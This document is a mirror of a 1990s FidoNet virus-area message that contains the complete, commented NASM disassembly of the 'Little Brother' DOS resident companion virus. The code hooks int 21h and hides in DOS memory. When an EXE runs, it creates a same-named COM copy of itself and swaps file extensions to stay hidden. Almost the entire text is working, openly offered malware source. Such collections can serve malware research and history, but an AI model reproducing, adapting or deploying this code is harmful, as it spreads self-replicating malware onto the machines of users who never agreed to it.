mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 12:25:29 +00:00
4b9382ddbc
push
248 lines
7.0 KiB
NASM
248 lines
7.0 KiB
NASM
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
|
||
; Msg : 37 of 54
|
||
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
|
||
; To : - *.* - Fri 11 Nov 94 08:10
|
||
; Subj : LTBRO299.DSM
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;.RealName: Max Ivanov
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;* Kicked-up by MeteO (2:5030/136)
|
||
;* Area : VIRUS (Int: ˆä®p¬ æ¨ï ® ¢¨pãá å)
|
||
;* From : Alan Jones, 2:283/718 (06 Nov 94 17:40)
|
||
;* To : Daniel Hendry
|
||
;* Subj : LTBRO299.DSM
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;@RFC-Path:
|
||
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
||
;18.n283!not-for-mail
|
||
;@RFC-Return-Receipt-To: Alan.Jones@f718.n283.z2.fidonet.org
|
||
;Little Brother - resident companion virus, 299 bytes.
|
||
|
||
;This virus stores itself inside DOS's data block, over the root directory
|
||
;copy. It hooks int 21h, function 4bh (subfunct. 0, load & exec) and
|
||
;creates a function 0deh for self identification. When a file is run,
|
||
;it first checks to see if it is a COM or an EXE. If it is an EXE, it
|
||
;will create a COM file with the same filename. Otherwise - if it is a
|
||
;COM, it will check to see if it is the virus by checking the size of the
|
||
;file and seeing if there is an EXE with the same (starting) filename.
|
||
;If so, it will change the filename to be run to the EXE host and allow
|
||
;DOS to execute it. This virus may cause errors (?) due to the place
|
||
;in memory it locates itself.
|
||
|
||
;Disassembly by Black Wolf.
|
||
|
||
.model tiny
|
||
.code
|
||
org 100h
|
||
|
||
start_virus:
|
||
cld
|
||
mov ax,0DEDEh ;Installation Check
|
||
int 21h
|
||
cmp ah,41h
|
||
je Exit_Virus ;If there - terminate
|
||
|
||
mov ax,44h
|
||
mov es,ax
|
||
mov di,100h ;Copy virus to 0044:0100
|
||
mov si,di ;Root directory entries?
|
||
mov cx,end_virus-start_virus ;This is inside DOS data
|
||
rep movsb ;block... may cause errors?
|
||
|
||
mov ds,cx ;DS = 0 = Interrupt table
|
||
mov si,84h ;0:84h = Int 21h entry in table
|
||
|
||
mov di,offset Old21_IP ;Save old Int 21h address
|
||
movsw
|
||
movsw
|
||
|
||
push es
|
||
pop ds ;Set DS to new seg...
|
||
|
||
mov dx,offset Int21_Handler
|
||
mov ax,2521h
|
||
int 21h ;Hook Int 21h.
|
||
|
||
Exit_Virus:
|
||
retn ;Terminate
|
||
|
||
|
||
EXE_Mask db 'EXE',0
|
||
COM_Mask db 'COM',0
|
||
|
||
CritErrHandler:
|
||
mov al,3
|
||
iret
|
||
|
||
Int21_Handler:
|
||
pushf
|
||
cmp ax,0DEDEh ;Is this an installation
|
||
je Install_Check ;check call?
|
||
|
||
push dx bx ax ds es ;Save regs....
|
||
|
||
cmp ax,4B00h ;Is it load and execute?
|
||
jne Exit_21h ;No... exit handler
|
||
call Infect_File ;Yes... infect file
|
||
|
||
Exit_21h:
|
||
pop es ds ax bx dx
|
||
popf
|
||
jmp dword ptr cs:[Old21_IP] ;Jump to Old Int 21h
|
||
|
||
Install_Check:
|
||
mov ax,4101h
|
||
popf
|
||
iret
|
||
|
||
Infect_File:
|
||
cld
|
||
mov word ptr cs:[Filename_off],dx ;Save filename offset
|
||
mov word ptr cs:[Filename_seg],ds ;and segment.
|
||
push cs
|
||
pop ds
|
||
mov dx,offset VirusDTA
|
||
mov ah,1Ah
|
||
int 21h ;Set DTA to us...
|
||
|
||
call Find_Extension
|
||
|
||
mov si,offset ds:[EXE_Mask]
|
||
mov cx,3
|
||
repe cmpsb ;Is it an EXE file?
|
||
jnz Not_EXE
|
||
|
||
mov si,offset COM_Mask
|
||
call Change_Ext ;Change extension to COM
|
||
|
||
mov ax,3300h
|
||
int 21h ;Get Ctrl-Break Status
|
||
push dx ;Save it....
|
||
|
||
xor dl,dl
|
||
mov ax,3301h
|
||
int 21h ;Disable Ctrl-Break.
|
||
|
||
mov ax,3524h
|
||
int 21h ;Get Int 24h handler's address
|
||
|
||
push bx
|
||
push es ;Save it for later...
|
||
|
||
push cs
|
||
pop ds ;DS = virus segment
|
||
|
||
mov dx,offset CritErrHandler
|
||
mov ax,2524h
|
||
int 21h ;Set Critical Error handler.
|
||
|
||
|
||
lds dx,dword ptr ds:[Filename_Off] ;DS:DX = filename
|
||
xor cx,cx ;Reg attributes
|
||
mov ah,5Bh
|
||
int 21h ;Create File..
|
||
jc Done_Infect
|
||
|
||
xchg ax,bx
|
||
push cs
|
||
pop ds
|
||
|
||
mov cx,end_virus-start_virus
|
||
mov dx,100h
|
||
mov ah,40h
|
||
int 21h ;Write entire virus
|
||
|
||
cmp ax,cx ;did it all write?
|
||
|
||
pushf
|
||
mov ah,3Eh ;Close file.
|
||
int 21h
|
||
popf
|
||
|
||
jz Done_Infect ;Yes, go Done_Infect
|
||
|
||
lds dx,dword ptr ds:[Filename_Off]
|
||
mov ah,41h
|
||
int 21h ;Delete file, incomplete
|
||
;write or write error.
|
||
|
||
Done_Infect:
|
||
pop ds
|
||
pop dx
|
||
mov ax,2524h
|
||
int 21h ;Restore Critical error handler
|
||
|
||
pop dx ;Get old CTRL-Break handler
|
||
mov ax,3301h ;status and restore it.
|
||
int 21h
|
||
|
||
mov si,offset EXE_Mask
|
||
call Change_Ext ;Change extension back to orig.
|
||
|
||
Leave_Infect:
|
||
retn
|
||
|
||
Not_EXE:
|
||
call Locate_File
|
||
cmp word ptr cs:[24dh], end_virus-start_virus
|
||
jne Leave_Infect ;Is the file size right for Virus?
|
||
|
||
mov si,offset EXE_Mask ;If so, is there an EXE of the same
|
||
call Change_Ext ;name as the COM file?
|
||
call Locate_File
|
||
jnc Leave_Infect ;If not exit, otherwise - is already
|
||
mov si,offset COM_Mask ;infected, so change extension
|
||
jmp short Change_Ext ;to run uninfected program.
|
||
|
||
|
||
Locate_File:
|
||
lds dx,dword ptr ds:[Filename_Off]
|
||
mov cl,27h
|
||
mov ah,4Eh
|
||
int 21h ;Find First Filename match.
|
||
retn
|
||
|
||
|
||
Change_Ext:
|
||
call Find_Extension
|
||
push cs
|
||
pop ds
|
||
movsw
|
||
movsw
|
||
retn
|
||
|
||
Find_Extension:
|
||
les di,dword ptr cs:[Filename_Off]
|
||
mov ch,0FFh
|
||
mov al,2Eh ;Scan through filename until a '.'
|
||
repne scasb
|
||
retn
|
||
|
||
Virus_Name db 'Little Brother',0
|
||
|
||
end_virus:
|
||
|
||
Old21_IP dw ?
|
||
Old21_CS dw ?
|
||
|
||
Filename_Off dw ?
|
||
Filename_Seg dw ?
|
||
|
||
VirusDTA:
|
||
end start_virus
|
||
|
||
;-+- FMail 0.96â
|
||
; + Origin: **SERMEDITECH BBS** Soissons FR (+33) 23.73.02.51 (2:283/718)
|
||
;=============================================================================
|
||
;
|
||
;Yoo-hooo-oo, -!
|
||
;
|
||
;
|
||
; þ The MeÂeO
|
||
;
|
||
;/v Include full symbolic debug information
|
||
;
|
||
;--- Aidstest Null: /Kill
|
||
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
|
||
|